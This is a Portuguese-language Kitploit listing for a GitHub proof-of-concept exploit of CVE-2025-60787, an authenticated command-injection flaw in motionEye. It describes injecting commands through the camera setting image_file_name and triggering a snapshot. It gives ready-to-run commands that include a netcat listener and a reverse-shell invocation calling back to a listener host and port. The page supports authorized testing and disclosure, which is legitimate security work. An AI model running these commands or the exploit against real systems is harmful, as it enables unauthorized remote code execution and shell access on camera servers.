Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-60787 — CVE-2025-60787 motionEye injeção de comando autenticada RCE PoC | Kitploit
Ferramentas/GitHubGitHub/ozcanpng/cve-2025-60787
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed Teaming
GitHubozcanpng/cve-2025-60787

CVE-2025-60787

CVE-2025-60787 motionEye injeção de comando autenticada RCE PoC

Ver Repositório
2há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-60787 — motionEye RCE autenticado

PoC de injeção de comandos autenticada para CVE-2025-60787. motionEye v0.43.1b4 e versões anteriores gravam valores de configuração de câmera controlados pelo usuário, como image_file_name, na configuração do Motion sem sanitização suficiente, permitindo a execução de comandos quando o valor é processado.

Apenas para testes autorizados e pesquisa. Não use contra sistemas que você não possua ou para os quais não tenha permissão explícita para testar.


O que faz

root@kitploit:~
Requisição de API assinada -> atualização da configuração da câmera -> injeção em image_file_name -> acionamento de snapshot -> execução de comando
  1. Valida o alvo e detecta o motionEye.
  2. Gera requisições de API do motionEye assinadas usando o nome de usuário e o hash de senha configurados.
  3. Lê a configuração da câmera por meio de /config/list/.
  4. Injeta um comando na configuração image_file_name da câmera.
  • Ativa imagens estáticas/snapshots manuais quando necessário.
  • Aciona /action/<camera_id>/snapshot/ para que o motionEye processe o nome de arquivo injetado.
  • Opcionalmente, restaura a configuração original da câmera.

  • Capturas de tela

    Configuração de reverse shell

    Configuração de reverse shell

    Injeção de configuração e acionamento

    Injeção de configuração e acionamento

    Shell recebido

    Shell recebido


    Configuração

    root@kitploit:~
    git clone https://github.com/ozcanpng/CVE-2025-60787.git
    cd CVE-2025-60787
    pip install -r requirements.txt
    

    Uso

    Prova segura de comando

    root@kitploit:~
    python3 CVE-2025-60787.py \
      --target http://127.0.0.1:8765 \
      --user admin \
      --password-hash HASH \
      --cmd 'id > /tmp/motioneye_rce'
    

    Reverse shell

    Inicie um listener primeiro:

    root@kitploit:~
    rlwrap nc -lvnp 4444
    

    Depois execute:

    root@kitploit:~
    python3 CVE-2025-60787.py \
      --target http://127.0.0.1:8765 \
      --port 8765 \
      --user admin \
      --password-hash HASH \
      --reverse-shell \
      --lhost 10.10.16.53 \
      --lport 4444
    

    Opções úteis:

    root@kitploit:~
    --camera-id N      ID da câmera a modificar (padrão: 1)
    --restore          Restaura a configuração original da câmera após o acionamento
    --dry-run          Constrói requisições assinadas sem modificar o alvo
    --debug            Exibe caminhos assinados canônicos, corpos e assinaturas
    --no-trigger       Atualiza a configuração sem acionar um snapshot
    --verify-tls       Verifica certificados HTTPS
    --yes              Pula o aviso de confirmação do reverse shell
    

    Afetados

    ProdutoVersão afetadaAcesso necessárioImpacto
    motionEye<= 0.43.1b4Acesso autenticado de admin/APIExecução de comandos do sistema operacional como o usuário do processo motionEye/Motion

    O privilégio resultante depende de como o motionEye é implantado. Em contêineres ou imagens de laboratório que executam o serviço como root, a execução de comandos pode ocorrer como root.


    Notas

    • O PoC espera o valor/hash de senha armazenado do motionEye porque esse valor é usado como chave de assinatura para requisições de API legadas.
    • O campo injetado é image_file_name.
    • Use --restore durante os testes para colocar a configuração original da câmera de volta após a exploração.
    • Prefira --cmd para validação segura antes de tentar um reverse shell.

    Referências

    • NVD — CVE-2025-60787
    • GitHub Security Advisory — GHSA-j945-qm58-4gjx
    • Projeto motionEye

    Autor

    ozcanpng — github.com/ozcanpng — ozcanpng.dev

    Baixar ferramenta